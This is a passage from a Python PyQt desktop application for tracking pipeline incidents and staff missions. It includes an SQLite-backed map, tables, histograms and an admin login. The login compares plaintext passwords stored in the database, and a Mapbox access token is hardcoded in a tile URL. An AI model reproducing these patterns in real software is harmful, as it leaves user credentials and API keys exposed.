3600} hours\"\r\n else:\r\n remaining_text = f\"{remaining_time.seconds // 60} minutes\"\r\n # Create a list item and make it checkable\r\n item = QtWidgets.QListWidgetItem(f\"{description} (Remaining Time: {remaining_text})\")\r\n item.setFlags(item.flags() | QtCore.Qt.ItemIsUserCheckable)\r\n item.setCheckState(QtCore.Qt.Unchecked) # Initial state is unchecked\r\n item.setData(Qt.UserRole, mission_id)\r\n# Add the item to the list\r\n self.mainwi.listWidget.addItem(item)\r\n\r\n# Connect the item's state change to the update_mission_state function\r\n self.mainwi.listWidget.itemChanged.connect(self.update_mission_state)\r\n\r\n# Retrieve upcoming missions for the current user\r\n upcoming_msquery = QSqlQuery()\r\n upcoming_msquery.prepare(\"SELECT * FROM messions WHERE assigned_to = ? AND state = 'pending'\")\r\n upcoming_msquery.addBindValue(id_user)\r\n upcoming_msquery.exec_()\r\n\r\n while upcoming_msquery.next():\r\n mission_id = upcoming_msquery.value(0)\r\n description = upcoming_msquery.value(1)\r\n start_date = upcoming_msquery.value(2)\r\n start_date = datetime.strptime(start_date, \"%Y-%m-%d %H:%M:%S\")\r\n remaining_time = start_date - datetime.now()\r\n\r\n if remaining_time.days > 365:\r\n remaining_text = f\"{remaining_time.days // 365} years\"\r\n elif remaining_time.days > 30:\r\n remaining_text = f\"{remaining_time.days // 30} months\"\r\n elif remaining_time.days > 0:\r\n remaining_text = f\"{remaining_time.days} days\"\r\n elif remaining_time.seconds > 3600:\r\n remaining_text = f\"{remaining_time.seconds // 3600} hours\"\r\n else:\r\n remaining_text = f\"{remaining_time.seconds // 60} minutes\"\r\n \r\n item = QtWidgets.QListWidgetItem(f\"{description} (Starts in: {remaining_text})\")\r\n item.setData(Qt.UserRole, mission_id)\r\n item.setSizeHint(item.sizeHint()) # Adjust the size of the item\r\n \r\n self.mainwi.listWidget_2.addItem(item)\r\n\r\n\r\n db.commit()\r\n db.close()\r\n\r\n \r\n def update_mission_state(self, item):\r\n clicked_item = self.mainwi.listWidget.item(self.mainwi.listWidget.row(item))\r\n mession_id = clicked_item.data(Qt.UserRole)\r\n\r\n db = QSqlDatabase.addDatabase(\"QSQLITE\")\r\n db.setDatabaseName(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n\r\n try:\r\n if not db.open():\r\n print(\"Failed to connect to the database.\")\r\n return\r\n\r\n update_query = QSqlQuery()\r\n update_query.prepare(\"UPDATE messions SET state = CASE WHEN end_date <= :current_date THEN 'completed' ELSE 'done late' END, end_date = :current_date WHERE mession_id = :mession_id\")\r\n update_query.bindValue(\":current_date\", QDateTime.currentDateTime().toString(\"yyyy-MM-dd HH:mm:ss\"))\r\n update_query.bindValue(\":mession_id\", mession_id)\r\n\r\n if not update_query.exec_():\r\n print(\"Error while updating the database:\", update_query.lastError().text())\r\n else:\r\n # Commit the transaction and remove the checked item from the list widget\r\n db.commit()\r\n self.mainwi.listWidget.takeItem(self.mainwi.listWidget.row(item))\r\n\r\n except Exception as e:\r\n print(\"An error occurred:\", str(e))\r\n finally:\r\n db.close() # Close the database connection\r\n\r\n\r\n def show_admin(self):\r\n # Get the username and password from the input fields\r\n username = self.lineEdit.text()\r\n password = self.lineEdit_2.text()\r\n db = QSqlDatabase.addDatabase(\"QSQLITE\")\r\n db.setDatabaseName(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n if not db.open():\r\n print(\"Failed to connect to the database.\")\r\n sys.exit(1)\r\n\r\n # Query the database for the username and password\r\n query = QSqlQuery()\r\n query.prepare(\"SELECT * FROM admin WHERE username = :username AND password = :password\")\r\n query.bindValue(\":username\", username)\r\n query.bindValue(\":password\", password)\r\n if query.exec_() and query.next():\r\n print(\"Login successful\")\r\n self.admin=admin()\r\n self.hide()\r\n self.admin.show()\r\n db.close()\r\n else:\r\n print(\"Login failed\")\r\n self.label_4.setText(\"Incorrect username or password.\")\r\n \r\n \r\n \r\nclass mainwi(QtWidgets.QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n uic.loadUi(resource_path('mainwindow.ui'), self)\r\n self.stackedWidget.setCurrentIndex(4)\r\n self.pushButton_2.clicked.connect(self.show_tab_2)\r\n self.pushButton.clicked.connect(self.show_tab_1)\r\n self.pushButton_4.clicked.connect(self.show_tab_3)\r\n self.pushButton_5.clicked.connect(self.show_tab_4)\r\n self.pushButton_6.clicked.connect(self.show_tab_5)\r\n self.radioButton.clicked.connect(self.plot_histogram)\r\n self.radioButton_2.clicked.connect(self.plot_histogram)\r\n self.radioButton_3.clicked.connect(self.plot_histogram)\r\n self.radioButton_4.clicked.connect(self.plot_histogram)\r\n self.canvas = None \r\n self.scheduler = BackgroundScheduler()\r\n \r\n\r\n# Schedule the job to run every minute (adjust as needed)\r\n self.scheduler.add_job(self.update_mission_states, 'interval', minutes=1)\r\n\r\n# Start the scheduler\r\n\r\n\r\n self.scheduler.start()\r\n # Create a layout for the main widget\r\n self.layout = QVBoxLayout(self.stackedWidget.widget(3))\r\n\r\n # Create the map widget\r\n self.map_widget = QWebEngineView()\r\n \r\n # Load the map URL (OpenStreetMap example)\r\n self.map_widget.load(QUrl(\"https://www.openstreetmap.org/export/embed.html?bbox=-74.1,40.7,-73.9,40.8&layer=mapnik\"))\r\n # creating the map object\r\n us_center = [39.8283, -98.5795]\r\n self.m = folium.Map(location=us_center, zoom_start=4,no_wrap=True)\r\n satellite_layer = TileLayer(\r\n tiles='https://api.mapbox.com/v4/mapbox.satellite/{z}/{x}/{y}.jpg?access_token=pk.eyJ1Ijoic2FyYXJhcmFyYXJhcmFyIiwiYSI6ImNsaHBmOGdyZDFxa2Uzcm9kdXRmZDR2NGMifQ.GjNfyd5TbRpFKZK5NvJAOA',\r\n attr='Map data © Mapbox',\r\n name='Satellite',\r\n overlay=True,\r\n control=True,\r\n nowrap=True\r\n \r\n) \r\n \r\n # with open(\"us-states.json\", \"r\") as f:\r\n # geojson_data = f.read()\r\n \r\n \r\n # folium.GeoJson(geojson_data, name=\"US States\").add_to(self.m) \r\n \r\n # Create a minimap and add it to the main map\r\n minimap = MiniMap()\r\n self.m.add_child(minimap)\r\n # Add the map widget to the layout\r\n \r\n self.layout.addWidget(self.map_widget)\r\n \r\n # Create a custom HTML element for the title\r\n title_html = \"\"\"\r\n

\r\n Geographical Localization of Incidents\r\n

\r\n \"\"\"\r\n\r\n # Inject the custom HTML element into the output HTML file\r\n self.m.get_root().html.add_child(folium.Element(title_html))\r\n\r\n \r\n conn = sqlite3.connect(resource_path('spdb.db'))\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * FROM Incidents\")\r\n rows = cursor.fetchall()\r\n marker_cluster = MarkerCluster(name='Markers').add_to(self.m)\r\n marker_data = []\r\n # icon = folium.features.CustomIcon('marker.svg', icon_size=(100, 100))\r\n\r\n\r\n for row in rows:\r\n \r\n ReportNumber = row[0]\r\n AccidentDateTime = row[1]\r\n OperatorID = row[2]\r\n PipelineFacilityName = row[3]\r\n PipelineType = row[4]\r\n LiquidType = row[5]\r\n AccidentState = row[6]\r\n AccidentLatitude = row[7]\r\n AccidentLongitude = row[8]\r\n CauseCategory = row[9]\r\n CauseSubcategory = row[10]\r\n UnintentionalRelease = row[11]\r\n LiquidIgnition = row[12]\r\n LiquidExplosion = row[13]\r\n PipelineShutdown = row[14]\r\n popup = f\"Report Number: {ReportNumber}
Accident Date/Time: {AccidentDateTime}
Operator ID: {OperatorID}
Pipeline/Facility Name: {PipelineFacilityName}
Pipeline Type: {PipelineType}
Liquid Type: {LiquidType}
Accident State: {AccidentState}
Accident Latitude: {AccidentLatitude}
Accident Longitude: {AccidentLongitude}
Cause Category: {CauseCategory}
Cause Subcategory: {CauseSubcategory}
Unintentional Release (Barrels): {UnintentionalRelease}
Liquid Ignition: {LiquidIgnition}
Liquid Explosion: {LiquidExplosion}
Pipeline Shutdown: {PipelineShutdown}\"\r\n marker = folium.Marker(location=[AccidentLatitude, AccidentLongitude],tooltip=\"click to see more info\", popup=popup,icon=folium.Icon(icon='glyphicon-wrench', color='blue', icon_color='white', icon_size=(40, 40))\r\n)\r\n marker_data.append(marker)\r\n \r\n # Add all markers to the map\r\n for marker in marker_data:\r\n marker.add_to(self.m)\r\n marker_cluster.add_child(marker)\r\n\r\n\r\n # Save the map to an HTML file\r\n satellite_layer.add_to(self.m)\r\n\r\n# Create a custom button to toggle the satellite layer\r\n folium.LayerControl(position='topleft').add_to(self.m)\r\n\r\n self.m.save(resource_path(\"map.html\"))\r\n conn.close()\r\n html_path = os.path.abspath(resource_path(\"map.html\"))\r\n self.map_widget.load(QUrl.fromLocalFile(html_path))\r\n \r\n \r\n \r\n QtCore.QMetaObject.connectSlotsByName(self)\r\n self.hamburgerbtn=QtWidgets.QPushButton(self.centralwidget)\r\n self.hamburgerbtn.setStyleSheet( \"\\n\"\r\n\"background-color: rgb(19, 51, 76);\" \r\n \"margin-top:10px;\"\r\n \"margin-left:10\"\r\n )\r\n icon = QIcon(resource_path('hamburger_orng.svg'))\r\n \r\n self.hamburgerbtn.setIcon(icon)\r\n self.hamburgerbtn.setGeometry(5,5, 40, 40)\r\n self.hamburgerbtn.setObjectName(\"hamburgerbtn\")\r\n self.hamburgerbtn.clicked.connect(self.toggleMenu)\r\n self.frame.setVisible(True)\r\n #self.stackedWidget.setGeometry(50,0,self.centralwidget.width()-50, self.centralwidget.height())\r\n# Access the widgets of the stacked widgetself.page1 = self.stackedWidget.widget(0)\r\n self.page1 = self.stackedWidget.widget(0)\r\n self.page2 = self.stackedWidget.widget(1)\r\n self.page3 = self.stackedWidget.widget(2)\r\n self.page4 = self.stackedWidget.widget(3)\r\n\r\n# Create the buttons for each widget\r\n self.button1 = QPushButton(\"\", self.page1)\r\n self.button2 = QPushButton(\"\", self.page2)\r\n self.button3 = QPushButton(\"\", self.page3)\r\n self.button4 = QPushButton(\"\", self.page4)\r\n\r\n# Set the button positions using absolute positioning\r\n self.button1.setGeometry(self.page1.width() - self.button1.width() -10, 2, self.button1.width(), self.button1.height())\r\n self.button2.setGeometry(self.page2.width() - self.button2.width() -10, 2, self.button2.width(), self.button2.height())\r\n self.button3.setGeometry(self.page3.width() - self.button3.width() -10, 2, self.button3.width(), self.button3.height())\r\n self.button4.setGeometry(self.page4.width() - self.button4.width() -10, 2, self.button4.width(), self.button4.height())\r\n self.button1.setFixedSize(30, 30) \r\n self.button1.setStyleSheet('''QPushButton { \r\n background-color:rgb(253, 95, 0);\r\n font: 900 11pt Arial Black;\r\n color:rgb(0, 87, 146);\r\n border: 1px solid rgb(237, 131, 0);\r\n border-radius:15%;\r\n text-align: left;\r\n padding-left:3px;\r\n }\r\n QPushButton:hover {\r\n background-color:qlineargradient(spread:repeat, x1:0, y1:1, x2:1, y2:0, stop:0.28436 rgba(253, 95, 0, 255), stop:0.890995 rgba(255, 193, 35, 255));\r\n border: 1px solid gray;\r\n box-shadow: 5px 10px rgb(255, 175, 15);\r\n }\r\n\r\n''')\r\n self.button2.setFixedSize(30, 30) \r\n self.button2.setStyleSheet('''QPushButton { \r\n background-color:rgb(253, 95, 0);\r\n font: 900 11pt Arial Black;\r\n color:rgb(0, 87, 146);\r\n border: 1px solid rgb(237, 131, 0);\r\n border-radius:15%;\r\n text-align: left;\r\n padding-left:3px;\r\n }\r\n QPushButton:hover {\r\n background-color:qlineargradient(spread:repeat, x1:0, y1:1, x2:1, y2:0, stop:0.28436 rgba(253, 95, 0, 255), stop:0.890995 rgba(255, 193, 35, 255));\r\n border: 1px solid gray;\r\n box-shadow: 5px 10px rgb(255, 175, 15);\r\n }\r\n\r\n''')\r\n self.button3.setFixedSize(30, 30) \r\n self.button3.setStyleSheet('''QPushButton { \r\n background-color:rgb(253, 95, 0);\r\n font: 900 11pt Arial Black;\r\n color:rgb(0, 87, 146);\r\n border: 1px solid rgb(237, 131, 0);\r\n border-radius:15%;\r\n text-align: left;\r\n padding-left:3px;\r\n }\r\n QPushButton:hover {\r\n background-color:qlineargradient(spread:repeat, x1:0, y1:1, x2:1, y2:0, stop:0.28436 rgba(253, 95, 0, 255), stop:0.890995 rgba(255, 193, 35, 255));\r\n border: 1px solid gray;\r\n box-shadow: 5px 10px rgb(255, 175, 15);\r\n \r\n }\r\n\r\n''')\r\n self.button4.setFixedSize(30, 30) \r\n self.button4.setStyleSheet('''QPushButton { \r\n background-color:rgb(253, 95, 0);\r\n font: 900 11pt Arial Black;\r\n color:rgb(0, 87, 146);\r\n border: 1px solid rgb(237, 131, 0);\r\n border-radius:15%;\r\n text-align: left;\r\n padding-left:3px;\r\n }\r\n QPushButton:hover {\r\n background-color:qlineargradient(spread:repeat, x1:0, y1:1, x2:1, y2:0, stop:0.28436 rgba(253, 95, 0, 255), stop:0.890995 rgba(255, 193, 35, 255));\r\n border: 1px solid gray;\r\n box-shadow: 5px 10px rgb(255, 175, 15);\r\n }\r\n\r\n''') \r\n self.button1.setIcon(QIcon(resource_path(\"icons8-home-page-26.png\")))\r\n self.button2.setIcon(QIcon(resource_path(\"icons8-home-page-26.png\")))\r\n self.button3.setIcon(QIcon(resource_path(\"icons8-home-page-26.png\")))\r\n self.button4.setIcon(QIcon(resource_path(\"icons8-home-page-26.png\")))\r\n\r\n self.button1.clicked.connect(self.home)\r\n self.button2.clicked.connect(self.home)\r\n self.button3.clicked.connect(self.home)\r\n self.button4.clicked.connect(self.home)\r\n\r\n validator = QDoubleValidator()\r\n self.lineEdit.setValidator(validator)\r\n self.lineEdit_2.setValidator(validator)\r\n self.lineEdit_3.setValidator(validator)\r\n self.lineEdit_4.setValidator(validator)\r\n self.lineEdit_6.setValidator(validator)\r\n self.lineEdit_7.setValidator(validator)\r\n \r\n self.save.clicked.connect(self.add_value)\r\n self.cancel.clicked.connect(self.clear_fields)\r\n self.pred.clicked.connect(self.predict_shutdown)\r\n self.lineEdit_5.textChanged.connect(self.search_table) \r\n\r\n self.dateTimeEdit.setDateTime(QDateTime.currentDateTime())\r\n self.dateTimeEdit_2.setDateTime(QDateTime.currentDateTime())\r\n self.toolButton.clicked.connect(self.show_menu)\r\n \r\n\r\n #styling the tabel\r\n self.tableWidget.setStyleSheet('''\r\n QTableWidget {\r\n background-color: rgb(19, 51, 76);\r\n border: 1px solid rgb(19, 51, 76);\r\n color: rgb(246, 246, 233);\r\n }\r\n \r\n QTableWidget::item {\r\n padding: 5px;\r\n border: 1px solid rgb(253, 95, 0) ;\r\n }\r\n \r\n QHeaderView::section {\r\n background-color: rgb(253, 95, 0);\r\n font-weight: bold;\r\n border: 1px solid rgb(253, 95, 0);\r\n color:rgb(0, 87, 146);\r\n }\r\n''')\r\n #styling the scroll bar\r\n self.tableWidget.verticalScrollBar().setStyleSheet('''\r\n QScrollBar:vertical {\r\n background: transparent;\r\n width: 15px;\r\n border-radius: 7px;\r\n margin: 20px 0 20px 0;\r\n }\r\n\r\n QScrollBar::handle:vertical {\r\n background: rgb(19, 51, 76);\r\n border-radius: 7px;\r\n min-height: 20px;\r\n }\r\n\r\n QScrollBar::add-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::sub-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {\r\n background: #e1e1e1; /* Set your desired background color */\r\n height: 15px;\r\n margin: 5px 0 5px 0;\r\n border-radius: 7px;\r\n }\r\n\r\n QScrollBar::handle:horizontal {\r\n background:rgb(19, 51, 76); /* Set your desired handle color */\r\n min-width: 20px;\r\n border-radius: 7px;\r\n \r\n }\r\n\r\n QScrollBar::add-line:horizontal,\r\n QScrollBar::sub-line:horizontal {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:horizontal,\r\n QScrollBar::sub-page:horizontal {\r\n background: none;\r\n }\r\n''')\r\n\r\n self.tableWidget_2.setStyleSheet('''\r\n QTableWidget {\r\n background-color: rgb(19, 51, 76);\r\n border: 1px solid rgb(19, 51, 76);\r\n color: rgb(246, 246, 233);\r\n }\r\n \r\n QTableWidget::item {\r\n padding: 5px;\r\n border: 1px solid rgb(253, 95, 0) ;\r\n }\r\n \r\n QHeaderView::section {\r\n background-color: rgb(253, 95, 0);\r\n font-weight: bold;\r\n border: 1px solid rgb(253, 95, 0);\r\n color:rgb(0, 87, 146);\r\n }\r\n''')\r\n #styling the scroll bar\r\n self.tableWidget_2.verticalScrollBar().setStyleSheet('''\r\n QScrollBar:vertical {\r\n background: transparent;\r\n width: 15px;\r\n border-radius: 7px;\r\n margin: 20px 0 20px 0;\r\n }\r\n\r\n QScrollBar::handle:vertical {\r\n background: rgb(19, 51, 76);\r\n border-radius: 7px;\r\n min-height: 20px;\r\n }\r\n\r\n QScrollBar::add-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::sub-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {\r\n background: none;\r\n }\r\n''')\r\n self.tableWidget_2.horizontalScrollBar().setStyleSheet('''\r\n QScrollBar:horizontal {\r\n background: #e1e1e1; /* Set your desired background color */\r\n height: 15px;\r\n margin: 5px 0 5px 0;\r\n border-radius: 7px;\r\n }\r\n\r\n QScrollBar::handle:horizontal {\r\n background:rgb(19, 51, 76); /* Set your desired handle color */\r\n min-width: 20px;\r\n border-radius: 7px;\r\n \r\n }\r\n\r\n QScrollBar::add-line:horizontal,\r\n QScrollBar::sub-line:horizontal {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:horizontal,\r\n QScrollBar::sub-page:horizontal {\r\n background: none;\r\n }\r\n''')\r\n self.tableWidget_3.setStyleSheet('''\r\n QTableWidget {\r\n background-color: rgb(19, 51, 76);\r\n border: 1px solid rgb(19, 51, 76);\r\n color: rgb(246, 246, 233);\r\n }\r\n \r\n QTableWidget::item {\r\n padding: 5px;\r\n border: 1px solid rgb(253, 95, 0) ;\r\n }\r\n \r\n QHeaderView::section {\r\n background-color: rgb(253, 95, 0);\r\n font-weight: bold;\r\n border: 1px solid rgb(253, 95, 0);\r\n color:rgb(0, 87, 146);\r\n }\r\n''')\r\n #styling the scroll bar\r\n self.tableWidget_3.verticalScrollBar().setStyleSheet('''\r\n QScrollBar:vertical {\r\n background: transparent;\r\n width: 15px;\r\n border-radius: 7px;\r\n margin: 20px 0 20px 0;\r\n }\r\n\r\n QScrollBar::handle:vertical {\r\n background: rgb(19, 51, 76);\r\n border-radius: 7px;\r\n min-height: 20px;\r\n }\r\n\r\n QScrollBar::add-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::sub-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {\r\n background: none;\r\n }\r\n''')\r\n self.tableWidget_3.horizontalScrollBar().setStyleSheet('''\r\n QScrollBar:horizontal {\r\n background: #e1e1e1; /* Set your desired background color */\r\n height: 15px;\r\n margin: 5px 0 5px 0;\r\n border-radius: 7px;\r\n }\r\n\r\n QScrollBar::handle:horizontal {\r\n background:rgb(19, 51, 76); /* Set your desired handle color */\r\n min-width: 20px;\r\n border-radius: 7px;\r\n \r\n }\r\n\r\n QScrollBar::add-line:horizontal,\r\n QScrollBar::sub-line:horizontal {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:horizontal,\r\n QScrollBar::sub-page:horizontal {\r\n background: none;\r\n }\r\n''')\r\n\r\n \r\n \r\n \r\n#######################################################################################\r\n#######################################################################################\r\n#################THE FUNCTIONSSSSSSSSSSS#############\r\n#######################################################################################\r\n####################################################################################### \r\n def show_menu(self):\r\n menu = QMenu(self)\r\n # Apply style sheet to the menu\r\n menu.setStyleSheet(\"\"\"\r\n QMenu {\r\n background-color: #13334C;\r\n border: 1px solid #005792;\r\n color: #005792;\r\n font: 700 8pt Arial Black;\r\n width:100px;\r\n }\r\n QMenu::item {\r\n padding: 5px 30px 5px 20px;\r\n border: 1px solid #005792;\r\n }\r\n QMenu::item:selected {\r\n background-color: #F6F6E9;\r\n color: #FD5F00;\r\n border: 1px solid rgb(253, 95, 0);\r\n }\r\n \"\"\")\r\n\r\n # Create actions with icons\r\n action1 = QAction(QIcon(resource_path(\"icons\\\\icons8-more-info-26.png\")), \"more info\", self)\r\n action2 = QAction(QIcon(resource_path(\"icons\\\\icons8-logout-48.png\")), \"Log Out\", self)\r\n \r\n # Set custom style for the actions\r\n action1.setIconVisibleInMenu(True)\r\n action1.setIconText(\"more info\")\r\n action1.setIcon(QIcon(resource_path(\"icons\\\\icons8-more-info-26.png\")))\r\n \r\n action2.setIconVisibleInMenu(True)\r\n action2.setIconText(\"Log Out\")\r\n action2.setIcon(QIcon(resource_path(\"icons\\\\icons8-logout-48.png\")))\r\n \r\n action1.triggered.connect(self.option1_selected)\r\n action2.triggered.connect(self.option2_selected)\r\n menu.addAction(action1)\r\n menu.addAction(action2)\r\n menu.exec_(self.toolButton.mapToGlobal(self.toolButton.rect().bottomLeft()))\r\n \r\n def option1_selected(self):\r\n print(\"Option 1 selected!\")\r\n\r\n def option2_selected(self):\r\n self.window1=Window1()\r\n self.hide()\r\n self.window1.show()\r\n def plot_histogram(self):\r\n conn = sqlite3.connect(resource_path('spdb.db'))\r\n query = \"SELECT * FROM Incidents WHERE `Pipeline Shutdown` = 'YES'\"\r\n df = pd.read_sql_query(query, conn)\r\n conn.close()\r\n df.info()\r\n\r\n # Get the selected radio button\r\n selected_button = self.sender()\r\n\r\n # Get the selected column name\r\n column_name = selected_button.text()\r\n print(column_name)\r\n\r\n # Plot the histogram based on the selected column\r\n plt.clf()\r\n fig = Figure(figsize=(6, 2))\r\n ax = fig.add_subplot(111)\r\n # Set padding values (adjust as needed)\r\n left = 0.2 # Left padding\r\n right = 0.9 # Right padding\r\n bottom = 0.2 # Bottom padding\r\n top = 0.9 # Top padding\r\n # Adjust subplot parameters\r\n fig.subplots_adjust(left=left, right=right, bottom=bottom, top=top)\r\n # Customize the color theme\r\n num_unique_values = len(df[column_name].unique())\r\n bar_colors = [random.choice(['#'+format(random.randint(0, 0xFFFFFF), '06x') for _ in range(6)]) for _ in range(num_unique_values)]\r\n background_color = 'lightgray' # Background color of the plot\r\n grid_color = 'white' # Color of the grid lines\r\n label_color = 'black' # Color of the axis labels \r\n # Set the colors\r\n ax.set_facecolor(background_color)\r\n ax.grid(color=grid_color)\r\n ax.spines['bottom'].set_color(label_color)\r\n ax.spines['left'].set_color(label_color)\r\n ax.tick_params(axis='x', colors=label_color)\r\n ax.tick_params(axis='y', colors=label_color)\r\n df[column_name].value_counts().plot(kind='bar', ax=ax, legend=False, color=bar_colors)\r\n ax.set_xlabel(column_name, fontsize=7)\r\n ax.set_xticklabels(ax.get_xticklabels(), rotation=10, ha='right')\r\n ax.tick_params(axis='x', labelsize=7) \r\n ax.set_ylabel('Pipeline Shutdown Count')\r\n ax.set_title('Histogram of Pipeline Shutdown based on {}'.format(column_name))\r\n # Enable zoom for the entire plot\r\n ax.autoscale(enable=True, tight=True)\r\n # Create or update the canvas\r\n if self.canvas is None:\r\n self.canvas = FigureCanvas(fig)\r\n layout = QtWidgets.QVBoxLayout(self.frame_2)\r\n self.toolbar = NavigationToolbar(self.canvas, self.frame_2) # Add the toolbar\r\n layout.addWidget(self.toolbar)\r\n layout.addWidget(self.canvas)\r\n self.frame_2.setLayout(layout)\r\n else:\r\n layout = self.frame_2.layout()\r\n layout.removeWidget(self.canvas)\r\n layout.removeWidget(self.toolbar) # Remove previous toolbar\r\n self.canvas.close()\r\n self.canvas = FigureCanvas(fig)\r\n self.toolbar = NavigationToolbar(self.canvas, self.frame_2) # Add the new toolbar\r\n layout.addWidget(self.toolbar)\r\n layout.addWidget(self.canvas)\r\n self.frame_2.setMinimumSize(self.canvas.sizeHint())\r\n self.canvas.draw() \r\n \r\n def update_mission_states(self):\r\n database_lock = threading.Lock()\r\n database_lock.acquire()\r\n\r\n try:\r\n conn = sqlite3.connect(resource_path('spdb.db')) # Replace with the path to your SQLite database file\r\n cursor = conn.cursor()\r\n\r\n # Get missions with states not 'completed' or 'done late'\r\n cursor.execute(\"SELECT * FROM messions WHERE state NOT IN ('completed', 'done late')\")\r\n missions = cursor.fetchall()\r\n\r\n # Update the state of each mission based on the current time\r\n current_time = datetime.now()\r\n for mission in missions:\r\n mission_id = mission[0]\r\n start_time = datetime.strptime(mission[2], \"%Y-%m-%d %H:%M:%S\")\r\n end_time = datetime.strptime(mission[3], \"%Y-%m-%d %H:%M:%S\")\r\n state = mission[5]\r\n if current_time < start_time:\r\n state= 'pending'\r\n elif start_time <= current_time < end_time:\r\n state = 'ongoing'\r\n\r\n # Update the mission's state in the database\r\n cursor.execute(\"UPDATE messions SET state = ? WHERE mession_id = ?\", (state, mission_id))\r\n\r\n conn.commit()\r\n conn.close()\r\n except Exception as e:\r\n # Handle any exceptions that may occur during the database operation\r\n print(\"Error while updating the database:\", str(e))\r\n finally:\r\n # Release the lock after the database operation is completed\r\n database_lock.release()\r\n def toggleMenu(self):\r\n # Toggle menu visibility\r\n \r\n self.frame.setVisible(not self.frame.isVisible())\r\n self.button1.setGeometry(self.page1.width() - self.button1.width()-20, 2, self.button1.width(), self.button1.height())\r\n self.button2.setGeometry(self.page2.width() - self.button2.width()-20, 2, self.button2.width(), self.button2.height())\r\n self.button3.setGeometry(self.page3.width() - self.button3.width()-20, 2, self.button3.width(), self.button3.height())\r\n self.button4.setGeometry(self.page4.width() - self.button4.width() -20 , 2, self.button4.width(), self.button4.height())\r\n\r\n if self.frame.isVisible():\r\n \r\n self.hamburgerbtn.setStyleSheet( \"\\n\" \"background-color: rgb(253, 95, 0);\"\r\n \"margin-top:10px;\"\r\n \"margin-left:10\"\r\n )\r\n icon2=QIcon(resource_path('hamburger.svg'))\r\n self.hamburgerbtn.setIcon(icon2)\r\n self.stackedWidget.setGeometry(250, 0, self.centralwidget.width()-250, self.centralwidget.height())\r\n self.tableWidget.setGeometry(30,70,500,500)\r\n \r\n \r\n # self.label_19.setGeometry(self.stackedWidget.width() - 110, 10, 40, 40)\r\n # self.toolButton.setGeometry(self.stackedWidget.width() - 110, 10, 100, 40)\r\n # Set the button positions using absolute positioning\r\n self.button1.setGeometry(self.page1.width() - self.button1.width()-20, 2, self.button1.width(), self.button1.height())\r\n self.button2.setGeometry(self.page2.width() - self.button2.width()-20, 2, self.button2.width(), self.button2.height())\r\n self.button3.setGeometry(self.page3.width() - self.button3.width()-20, 2, self.button3.width(), self.button3.height())\r\n self.button4.setGeometry(self.page4.width() - self.button4.width() -20 , 2, self.button4.width(), self.button4.height())\r\n\r\n else :\r\n \r\n self.hamburgerbtn.setStyleSheet( \"\\n\" \" background-color: rgb(19, 51, 76);\" \r\n \"margin-top:10px;\"\r\n \"margin-left:10\")\r\n icon = QIcon('hamburger_orng.svg')\r\n self.hamburgerbtn.setIcon(icon)\r\n self.stackedWidget.setGeometry(50,0,self.centralwidget.width()+200, self.centralwidget.height())\r\n self.tableWidget.setGeometry(30,70,700,500)\r\n self.button1.setGeometry(self.page1.width() - self.button1.width() +50, 2, self.button1.width(), self.button1.height())\r\n self.button2.setGeometry(self.page2.width() - self.button2.width() +50, 2, self.button2.width(), self.button2.height())\r\n self.button3.setGeometry(self.page3.width()- self.button3.width()+50, 2, self.button3.width(), self.button3.height())\r\n self.button4.setGeometry(self.page4.width() - self.button4.width() +50, 2, self.button4.width(), self.button4.height())\r\n \r\n \r\n # self.label_19.setGeometry(self.stackedWidget.width() +110, 10, 40, 40)\r\n # self.toolButton.setGeometry(self.stackedWidget.width() + 110, 10, 100, 40)\r\n def home(self):\r\n self.stackedWidget.setCurrentIndex(4)\r\n def show_tab_1(self):\r\n self.stackedWidget.setCurrentIndex(0)\r\n \r\n def show_tab_2(self):\r\n self.stackedWidget.setCurrentIndex(2) \r\n \r\n def show_tab_3(self):\r\n self.stackedWidget.setCurrentIndex(1) \r\n # Connect to the database\r\n conn = sqlite3.connect(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n cursor = conn.cursor()\r\n \r\n # Retrieve data from the database table\r\n cursor.execute(\"SELECT * FROM Incidents\")\r\n data = cursor.fetchall()\r\n\r\n # Set the number of rows and columns in the table\r\n self.tableWidget.setRowCount(len(data))\r\n self.tableWidget.setColumnCount(len(data[0])) # Assuming all rows have the same number of columns\r\n\r\n # Add data to the table\r\n for i, row in enumerate(data):\r\n for j, value in enumerate(row):\r\n item = QTableWidgetItem(str(value))\r\n self.tableWidget.setItem(i, j, item)\r\n\r\n # Set table properties\r\n header_labels = [description[0] for description in cursor.description]\r\n self.tableWidget.setHorizontalHeaderLabels(header_labels)\r\n self.tableWidget.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\r\n self.tableWidget.setSizeAdjustPolicy(QTableWidget.AdjustToContents)\r\n self.tableWidget.setEditTriggers(QTableWidget.NoEditTriggers)\r\n self.tableWidget.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)\r\n self.tableWidget.verticalHeader().setVisible(False)\r\n self.tableWidget.resizeRowsToContents()\r\n self.tableWidget.resizeColumnsToContents()\r\n\r\n # Close the database connection\r\n conn.close()\r\n \r\n \r\n def show_tab_4(self):\r\n self.stackedWidget.setCurrentIndex(3)\r\n def show_tab_5(self):\r\n self.stackedWidget.setCurrentIndex(5) \r\n # Connect to the database\r\n conn = sqlite3.connect(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n cursor = conn.cursor()\r\n \r\n # Retrieve data from the database table\r\n cursor.execute(\"SELECT * FROM Pipelines\")\r\n data = cursor.fetchall()\r\n\r\n # Set the number of rows and columns in the table\r\n self.tableWidget_2.setRowCount(len(data))\r\n 